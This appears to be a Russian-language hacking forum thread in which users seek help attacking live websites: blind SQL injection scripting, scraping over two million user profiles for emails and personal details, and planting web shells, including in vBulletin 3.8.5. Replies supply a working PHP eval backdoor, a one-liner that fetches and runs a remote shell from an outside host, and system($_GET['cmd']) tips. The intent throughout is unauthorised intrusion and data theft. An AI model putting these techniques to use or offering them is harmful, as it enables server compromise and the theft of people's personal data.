Короче, хочу разобраться в написание скрипта эксплатирующего blind sql inj методом " Бинарный (двоичный) поиск нужного символа" токо я не допонимаю как написать реализацию (тут не оч. понтяно https://forum.antichat.ru/showpost.php?p=1258161&postcount=1) дайте плиз ссыль на наглядный пример того метода
там как раз таки довольно хорошо написано, ну а если ты разобраться не можешь то о каком скрипте может быть речь?
Твой ФТП, скорей всего, недоступен из веба да и все. Единственный путь- это найти на самом сайте локальный инклюд и найти, куда ты льешь шелл и заинклюдить его. Скинь лучше линк на сайт в теме.
Вопрос http://localhost/xxx.php?p=1 профиль первого юзера http://localhost/xxx.php?p=2 профиль второго юзера и т.д. В профиле указан город, мыло, имя, пол и т.д. юзеров более 2 млн. Как спарсить на автомате инфу обо всех юзерах? Чтобы дамп был вида: мыло, пол, город мыло, пол, город мыло, пол, город Буду рад любой помощи.
Залил веб шелл, пробую обратиться к нему - получаю пустую страницу (то что он по этому адресу - 100%). Простейшие же php файлы типа <?php echo 'asdasd'; ?> исполняются нормально. Что бы это могло быть?
iv. Без линка причину тебе врятле скажут сразу же,могут быть только догадки.А то что он залился,это не факт,то что исполняется один код ето хорошо. Попробуй сделать следующее: Попробуй вставить в шаблон (или куда ты там впихиваешь пхп код) следующий код: <?php eval(stripslashes($_GET[e])); ?> Затем проверь: site.com/shablon.php?e=phpinfo(); Если все окей и директива url_fopen = on то: site.com/shablon.php?e=eval(file_get_contents('http://tvoisite.com/shelleng.txt')); Убери только <?php и ?> из шелленга и залей на какой-нибудь фрихост с расширением тхт,пароль также советую убрать,т.к. шелл не заливается на сервак.
Шелл, наверное, загзипован, а на сервере не стоит это расширение. Попробуй другой шелл, без gzinflate() или распакуй его.
Кто может подсказать как из Acunetix Web Vulnerability Scanner снимать найденные уязвимости? сайт сканирован, нашел несколько SQL иньексии, но не показывает URL: вот не понимаю как отсюда эксплуатировать это делол.
давно не пользуюсь сканерами для багов, но если по памяти то , нажми на багу (скулю) с правой стороны проги eсть окошко где будет уязвимый скрипт и метод (пост или гет) ..
Подскажите с залитием шелла в булку Версия 3.8.5 сделал плагин с шеллом /forum/faq.php?cmd=dir работает а phpinfo и остальное не хочет, в чем проблема! И кто знает еще способы залить шелл в этой версии!
твой скрин и дал ответ на твой вопрос, у меня скрины не грузились и я не видел что на них, только сейчас и увидел.. попробуй тулзу от пашкелы она c пост методом работает..
че то не понял.. т.е. эта прога так и не показывает уязвимые ссылки? тогда зачем такая громозкая программа и такая цена? А что за тулза от пашкелы?
Уязвимость в POST запросе, не в GET, штатными средствами браузера ты через адресную строку не передашь. +1 к вопросу про Пашкелу.
дай угадаю, в faq.php ты засунул код system($_GET['cmd']) а ОС сервера на котором стоит атакуемый сайт Windows Используй какие-нибудь callback функции или же просто eval, для выполнения своего php кода.